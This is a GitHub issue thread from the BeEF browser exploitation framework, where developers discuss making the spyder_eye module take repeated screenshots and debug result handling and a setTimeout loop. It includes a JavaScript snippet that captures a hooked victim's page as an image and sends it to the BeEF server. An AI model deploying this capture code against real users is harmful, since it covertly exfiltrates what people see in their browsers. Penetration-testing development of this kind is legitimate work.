### ISSUE TITLE
Question rather than issue - repeated modules invocation

### ISSUE THREAD

**Issue by mgeeky** [beefproject/beef#1247]
Hello there,

I'm trying to add repeated invocation of `spyder_eye`'s command.js code. Right now, all I have is something like this:

```
snap = function(num) {
		try {
			html2canvas(document.body).then(function(canvas) {
	    		var d = canvas.toDataURL('image/png');
	    		beef.net.send('<%= @command_url %>', <%= @command_id %> + num, 'image=' + d );
	    	});
	    }
	    catch (e) {
	    	beef.net.send('<%= @command_url %>', <%= @command_id %> + num, 'result=Obtaining snapshot failed: ' + e.message);
	    }
	};
	takeit = function() {
		for(var i = 0; i < takes; i++) {
			setTimeout(snap(i), delay);
		}
	};
```

mind the not so elegant and surely improper: `<%= @command_id %> + num`

Which can be reviewed at:
[mgeeky get_snapshot branch](https://github.com/mgeeky/beef/commit/ae2488e7bda42a512238df499ff8f2eb94f9d811)

From what I've briefly understood from the module handling code - there is no such possibility at the moment, is that correct?

If so, what would you propose to accomplish multiple command results in web-gui coming from single command-id? :)

Calling: @antisnatchor @bcoles 
Hope you guys don't mind being called :)

Cheers,
MB.

**Comment by bcoles** [comment]
@mgeeky cool. We're always open to ideas.

Off the top of my head, I think `command_id + 1` is bad and will break things. I could be wrong.

The good news is BeEF handles multiple command results coming from a single command ID, so you can just use `command_id`. The `post_execute` method will execute for each response received.

Unfortunately, the existing `post_execute` function for this module will only write one png to disk for each command, thus it will get overwritten each time a screenshot is received for a single command ID. You could augment this method to include a timestamp in the filename, rather than the command id, which should fix this. (also, it might be worth adding other info to the filename, such as the hooked origin and hooked browser id - strictly validated of course). Additionally, it may be worth including a timestamp along with the screenshot in the reply from the module. This could be useful in the event the replies arrive out of order for some reason.

I skim read your code. It looks good. A couple of observations:

`require 'base64'` in module.rb - I know this was already in the module, but I don't think it's necessary as it's loaded in `core/loader.rb`

The two `parseInt()` calls should use a second argument `10` to signify base 10. (see; https://stackoverflow.com/questions/1133770/how-do-i-convert-a-string-into-an-integer-in-javascript)

Some client-side debugging with `beef.debug` would be nice :) Perhaps wrapping the html2canvas call in a try/catch.

**Comment by mgeeky** [comment]
Thanks for your ideas! Already implemented some of those. 

Unfortunately, I don't know what is going on but by specyfing for instance 10 takes to obtain, beef only returns me with 5 of those. No matter what delay I'll set. Looks like there is some kind of throttling going on somewhere or possibly several `post_execute` callbacks are hitting kind of a limit? 

What I've observed from a localhost-based test, by specyfing:
1 take - there will be 1 screenshot stored.
2 takes - there will be 1 screenshot stored.
3 takes - there will be 2 screenshots stored.
4 takes - there will be 4 screenshots stored.
6 takes - there will be 4 screenshots stored.
7 takes - there will be 4 screenshots stored.

And so on. Also, they will come in irregular delays - first screenshot after for instance `delay` amount of time, and every next one second after. 
Most likely this can be due to either slowdowns with `AssetHandler.instance.bind` or with the `html2canvas` rendering time itself (also canvas data propagation time).

At the moment I don't have that much time to play around with this but surely I'd like to overcome this nuance somehow.

Any ideas? :)

**Comment by bcoles** [comment]
@mgeeky  `setTimeout(snap, delay);` in a loop won't work as expected. This will cause `snap()` to execute `takes` times after `delay` - not execute `snap()`  `takes` times with `delay` between each.
